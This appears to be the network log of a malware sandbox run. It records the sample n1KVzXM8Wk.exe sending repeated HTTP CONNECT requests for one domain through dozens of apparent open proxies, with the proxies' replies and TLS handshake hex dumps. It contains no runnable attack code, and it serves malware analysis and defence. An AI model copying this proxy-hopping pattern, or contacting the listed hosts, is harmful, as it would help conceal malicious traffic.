                                                                                                      1065192.168.2.452991103.200.135.23041456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.067368984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1066192.168.2.45168687.126.65.1113886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.070440054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1067192.168.2.453023199.229.254.12941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.072000980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1068192.168.2.45304445.14.174.148806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.093904972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.181188107 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1069192.168.2.453007175.183.82.221806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.128077984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1070192.168.2.453036163.172.97.13731286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.141851902 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.680838108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.178420067 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.178361893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.178925037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.178381920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.179217100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.084233046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.568777084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1071192.168.2.453008114.132.202.24680806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.145682096 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.009795904 CET84INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:24 GMT
                                                                                                      Transfer-Encoding: chunked


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1072192.168.2.453074172.67.190.934436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.155807972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1073192.168.2.45305151.38.50.24992246812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.191988945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.740592957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.257339001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.271034002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.333551884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.377054930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.377675056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.348167896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:44.334362984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1074192.168.2.452849191.37.155.13556786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.270103931 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1075192.168.2.453093172.67.190.934436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.314949989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1076192.168.2.452470142.54.229.24941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.331584930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1077192.168.2.4530453.112.35.20831286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.333708048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.634875059 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1078192.168.2.45305358.234.116.19781976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.361368895 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1079192.168.2.45230572.195.34.5841456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.383665085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1080192.168.2.4530598.213.128.9080896812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.383986950 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:26.695192099 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1081192.168.2.45287477.242.235.3541536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.414307117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1082192.168.2.45190379.110.197.14480816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.421044111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1083192.168.2.452965170.106.193.128300016812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.421334982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1084192.168.2.45309051.15.210.79163796812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.422178984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.903671980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.492096901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.589622021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.574265957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.586199045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.622889042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.647161007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:44.537393093 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:47.011451960 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                      Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1085192.168.2.453080119.39.68.7923236812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.515672922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1086192.168.2.452009167.114.107.37806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.551441908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.691006899 CET70INHTTP/1.0 200 Connection Established
                                                                                                      Proxy-agent: Website Firewall
                                                                                                      Feb 23, 2024 09:45:24.700772047 CET202OUTData Raw: 16 03 03 00 c5 01 00 00 c1 03 03 65 d8 5b 24 b0 6e 2d f5 27 5a 86 e4 d9 79 75 98 24 9a 7f 6f 3c b1 f3 eb 1e 55 3e 78 04 e3 0c bc 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e[$n-'Zyu$o<U>x*,+0/$#('=<5/n-+(heygirlisheeverythingyouwantedinaman.com#
                                                                                                      Feb 23, 2024 09:45:24.823327065 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 d8 5b 24 66 d7 ec a1 0e 2a 9a 88 24 f9 b7 62 5f 08 21 df 62 7c c0 71 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 cb 0b 00 10 c7 00
                                                                                                      Data Ascii: C?e[$f*$b_!b|qDOWNGRD/#00`4ZmQ0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240212203110Z240512203109Z03110/
                                                                                                      Feb 23, 2024 09:45:24.823334932 CET174INData Raw: 6d dd 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 03 82 01 01 00 1f 8b 40 68 93 64 2a 2d dc 07 bd 7a 5f 46 c4 ea f2 c8 d7 63 e0 4e cc 42 c7 44 46 d1 17 84 d3 1f 08 47 69 c2 b6 7f dd 9d a0 2d 9e 1b be 1f f8 19 ab ad d9 8d 7d 14 62 f3 40 cf 76 94
                                                                                                      Data Ascii: m0*H@hd*-z_FcNBDFGi-}b@v*wTJ;dm55inz74|"@,+v?iS't
                                                                                                      Feb 23, 2024 09:45:24.823822021 CET1286INData Raw: a3 e4 d5 3b 48 03 d9 a4 25 cb 08 0c 15 0b f0 5b 9d cd 27 fd a8 ef f9 8b c7 ac dc 0d be eb 0c 72 e2 42 ee 75 2a b8 1b b1 19 71 88 a8 e8 2c 14 2f 09 61 65 b1 cd 59 a5 fa 58 68 9d a3 d1 9c d8 9d c9 08 56 96 9f 42 d9 d5 96 63 1b 0b 86 be 5f f0 0e 94
                                                                                                      Data Ascii: ;H%['rBu*q,/aeYXhVBc_[:72cG^x}gv00tP'S"0*H0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R10200813000042Z2
                                                                                                      Feb 23, 2024 09:45:24.823832989 CET1286INData Raw: 51 07 7b de 3d b0 c8 ef 30 7a 24 2d be b8 b3 86 f6 4b f7 f0 b5 4f ff ce c6 f9 f6 3f 2a 27 08 0f 09 3e 23 5a c7 e3 42 2d 7a 36 e4 3d 98 96 60 39 98 ea d1 db 63 2a eb 78 09 b1 4e 21 b3 8e b7 ce 3e 92 f1 95 5c a4 39 d0 c0 2b c8 53 15 f5 d2 2f 82 cd
                                                                                                      Data Ascii: Q{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*j%[ @4 awHI)adcGF9sO+Xe Uon=zc
                                                                                                      Feb 23, 2024 09:45:24.823873997 CET658INData Raw: 73 72 31 2e 63 72 6c 30 3b 06 03 55 1d 20 04 34 30 32 30 08 06 06 67 81 0c 01 02 01 30 08 06 06 67 81 0c 01 02 02 30 0d 06 0b 2b 06 01 04 01 d6 79 02 05 03 02 30 0d 06 0b 2b 06 01 04 01 d6 79 02 05 03 03 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05
                                                                                                      Data Ascii: sr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ#+IjuXHW5oo*Ni-h+s"7fIUg2
                                                                                                      Feb 23, 2024 09:45:24.825906038 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 35 b7 00 d6 9b 1d cc 97 ec 58 5e 41 78 83 89 3f f8 32 af e7 10 eb 45 6c 9f 02 e8 5f fc 5b eb 50 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 a5 6a 3c 1d 2c d0 60 80 d8 b8 f5 0b 07 44 58 97 87 b3 de b4 20
                                                                                                      Data Ascii: %! 5X^Ax?2El_[P(j<,`DX %+?k
                                                                                                      Feb 23, 2024 09:45:24.943655014 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 20 00 c0 5c cb a0 02 7b 9e cb 65 2e ce 21 e0 00 b0 bd 6f fc 04 0f 3b f1 1e 0c 6e 32 74 a4 6b cd a2 30 7f 33 17 67 6e 66 24 d8 68 84 c9 df a5 43 87 7f 27 60 6e 3c c9 28 35 ae f4 c9 9f b5 b4 92 ef 66 b6 ef f5 6a
                                                                                                      Data Ascii: \{e.!o;n2tk03gnf$hC'`n<(5fjWE]l[fQ0d)0x#}:/y^~\d|EI_nC@(de,p_q$46?:eCU(t"VI5eZ]
                                                                                                      Feb 23, 2024 09:45:25.054125071 CET147OUTData Raw: 17 03 03 00 8e 00 00 00 00 00 00 00 01 54 3b 1a eb e1 14 03 2f 1a 88 95 00 b4 4e 70 eb 7b 61 0f a4 d4 16 43 02 5e 7f 76 00 61 56 7e 75 fa ee 35 3a 10 bb aa 83 88 38 2e d8 a5 eb 24 85 f0 08 45 be 5a 7e 92 fc 1b 89 72 78 21 14 8f 13 93 cd 4f f3 dc
                                                                                                      Data Ascii: T;/Np{aC^vaV~u5:8.$EZ~rx!O0#Z#wh+~T\110mJ/+r<$m7Z7'^
                                                                                                      Feb 23, 2024 09:45:25.404613972 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 62 bb cb 91 15 60 11 22 fe 90 eb d4 5f c3 04 06 be 89 98 89 f1 b7 0a 6b 40 9c b5 ad 30 d9 48 eb e0 ca 66 3a 8b 40 43 ed 06 ac 3d ec 6a e8 26 cc 70 4e 5f df 36 46 b8 61 b6 b3 e3 9e f1 67 a4 0e 41 a3 f6 df f0
                                                                                                      Data Ascii: qb`"_k@0Hf:@C=j&pN_6FagAG %\b*_>uxAb|Z-?#m!o<4)RrB74\Pj?LT,G9 RDR4&Zm6`X=%H$!#e<SO>ez==2


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1087192.168.2.453086195.88.240.162806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.562634945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:24.818644047 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1088192.168.2.45202450.63.13.3120356812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:24.588594913 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.178185940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:25.680612087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.682933092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.475240946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.365890980 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
